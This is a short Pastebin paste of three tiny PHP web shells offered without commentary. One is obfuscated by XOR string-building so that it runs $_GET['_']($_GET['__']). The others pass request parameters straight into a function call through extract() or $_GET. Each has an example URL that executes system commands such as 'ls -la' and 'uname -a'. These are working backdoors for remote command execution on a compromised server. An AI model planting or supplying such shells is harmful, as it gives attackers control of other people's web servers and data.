Guest User

Untitled

a guest
Aug 14th, 2015
195
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.31 KB | None | 0 0
  1. 1.
  2. <?php
  3. $_="{";$_=($_^"<").($_^">").($_^"/");${'_'.$_}["_"](${'_'.$_}["__"]);
  4. ?>
  5. example: #q.php?_=system&__=ls -la
  6.  
  7. 2.
  8. @extract($_REQUEST);
  9. @die($ctime($atime));
  10.  
  11. example: http://site.com/PoC.php?ctime=system&atime=ls -la
  12.  
  13. 3.
  14. <?php
  15. $_GET['a']($_GET['b']);
  16. example: .php?a=system&b=uname -a
Advertisement
Add Comment
Please, Sign In to add comment